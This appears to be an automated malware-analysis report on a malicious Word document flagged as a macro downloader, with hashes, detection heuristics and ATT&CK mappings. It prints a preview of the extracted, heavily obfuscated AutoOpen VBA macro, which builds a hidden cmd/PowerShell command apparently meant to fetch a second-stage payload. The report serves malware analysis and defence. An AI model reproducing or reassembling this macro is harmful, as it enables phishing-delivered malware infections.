Office (OLE) malware analysis — malicious · 3f5b446bc3dc77dd

MALICIOUS

Office (OLE)

86.8 KB Created: 2018-08-20 19:03:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 2543b2fa1b7fd2a2be86a3451b68029b SHA-1: f7f35cad09cf970ee332c3632b522ec8d1d9ad78 SHA-256: 3f5b446bc3dc77dd04adbc849905d76bffb20ca719a21e9db2234de659224147

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro attempts to construct and execute a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665587-0' further supports this downloader behavior. The AutoOpen macro indicates it will execute automatically upon opening.

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6665587-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6665587-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44656 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	44656 bytes
SHA-256: `784b5c8c99e852d9632a95621dd36ee9d8d898274185d8d9665954306f3fbf73`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HMQYWlKi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "lHjrUoaS" Function YLRWtFl() On Error Resume Next IsArray CDate(OBqQBV - vwBoSo) VKnsP = jNUCF - GzIwdK * uILnN + iVkjl IsArray Sqr(NijkS) VarType LCase(22305 * sXaAn / GIakYk / zFPihb) JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + " s^E" + "^t " + " ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l" VarType Log(4) jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A" VKnsP = MZsJI + hSYLb aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^" VarType hKLqwO - zVRCR / 25307 * oMqtj VarType Tan(bpTbNX) VarType Int(AEfpiw) IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^" VKnsP = Oct(82734 / 19718) VKnsP = 57875 - owrmk VarType Sqr(moizDq) VarType CDec(3266) IsArray Hex(7028) iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A" VKnsP = CDec(uLVMB) kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^" VarType Str(59989 * lXYtC + 95065 + pTMscI) IsArray Hex(3) VarType 4111 / QQIpa VKnsP = Str(kvXWT) VarType Second(nSItk) KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A" VarType MiPYu + VLiAr - wfbIR - YqwEKY IsArray uXWTX + nCjDad + 65604 * RqpSZX MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+" VarType TimeValue(253183858) IsArray CBool(558) IsArray Second(jdULI / VLrEwj) fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^" YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF VKnsP = CDate(14519 / qWqzp / JojZdU * 68430) VarType 50642 / 72586 VarType 85356 / PhBjzq End Function Function pzijAUz() On Error Resume Next IsArray Oct(94) rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^" VKnsP = CDbl(9) VarType Sqr(ikmcLT) IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?" IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan) VarType cJssD + 45380 - csnsn + lCAOS IsArray Oct(hdLhCc / DtfdYk) PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A" VKnsP = KUCZY + UdBTmq VarType QONkT + jcmQE LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^" VKnsP = paHITz - huimu / 51839 - DrQih VKnsP = Str(1) IsArray 39495 + BzhLv VarType Hex(2975) VarType Oct(pXfIAp) tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw" VKnsP = Month(VUiYJ) IsArray Month(18492 / dUjKf + aUcUos - IOwUQ) wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^" VarType nWZMSR * wotiGO jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v" VKnsP = CDate(1) GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?" VarType Log(FBwKm) IsArray CDec(XEvGWY) VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz IsArray Log(zXobJ) FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?" IsArray CStr(89) VarType Int(kAYGj) VarType 28348 / MRoZpu / 77 + EmHDj GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^" pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB VKnsP = TypeName(HDalfY) IsArray Fix(3300) VKnsP = CDbl(wUDJ ... (truncated)

SHA-256: 784b5c8c99e852d9632a95621dd36ee9d8d898274185d8d9665954306f3fbf73

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HMQYWlKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lHjrUoaS"
Function YLRWtFl()
On Error Resume Next
IsArray CDate(OBqQBV - vwBoSo)
   VKnsP = jNUCF - GzIwdK * uILnN + iVkjl
   IsArray Sqr(NijkS)
   VarType LCase(22305 * sXaAn / GIakYk / zFPihb)
JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c   " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + "  s^E" + "^t " + "   ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l"
VarType Log(4)
jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A"
VKnsP = MZsJI + hSYLb
aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^"
VarType hKLqwO - zVRCR / 25307 * oMqtj
   VarType Tan(bpTbNX)
   VarType Int(AEfpiw)
IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^"
VKnsP = Oct(82734 / 19718)
   VKnsP = 57875 - owrmk
   VarType Sqr(moizDq)
   VarType CDec(3266)
   IsArray Hex(7028)
iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A"
VKnsP = CDec(uLVMB)
kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^"
VarType Str(59989 * lXYtC + 95065 + pTMscI)
   IsArray Hex(3)
   VarType 4111 / QQIpa
   VKnsP = Str(kvXWT)
   VarType Second(nSItk)
KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A"
VarType MiPYu + VLiAr - wfbIR - YqwEKY
   IsArray uXWTX + nCjDad + 65604 * RqpSZX
MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+"
VarType TimeValue(253183858)
   IsArray CBool(558)
   IsArray Second(jdULI / VLrEwj)
fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^"
YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF
   VKnsP = CDate(14519 / qWqzp / JojZdU * 68430)
   VarType 50642 / 72586
   VarType 85356 / PhBjzq
End Function
Function pzijAUz()
On Error Resume Next
IsArray Oct(94)
rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^"
VKnsP = CDbl(9)
   VarType Sqr(ikmcLT)
IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?"
IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan)
   VarType cJssD + 45380 - csnsn + lCAOS
   IsArray Oct(hdLhCc / DtfdYk)
PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A"
VKnsP = KUCZY + UdBTmq
   VarType QONkT + jcmQE
LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^"
VKnsP = paHITz - huimu / 51839 - DrQih
   VKnsP = Str(1)
   IsArray 39495 + BzhLv
   VarType Hex(2975)
   VarType Oct(pXfIAp)
tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw"
VKnsP = Month(VUiYJ)
   IsArray Month(18492 / dUjKf + aUcUos - IOwUQ)
wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^"
VarType nWZMSR * wotiGO
jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v"
VKnsP = CDate(1)
GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?"
VarType Log(FBwKm)
   IsArray CDec(XEvGWY)
   VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz
   IsArray Log(zXobJ)
FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?"
IsArray CStr(89)
   VarType Int(kAYGj)
   VarType 28348 / MRoZpu / 77 + EmHDj
GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^"
pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB
   VKnsP = TypeName(HDalfY)
   IsArray Fix(3300)
   VKnsP = CDbl(wUDJ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.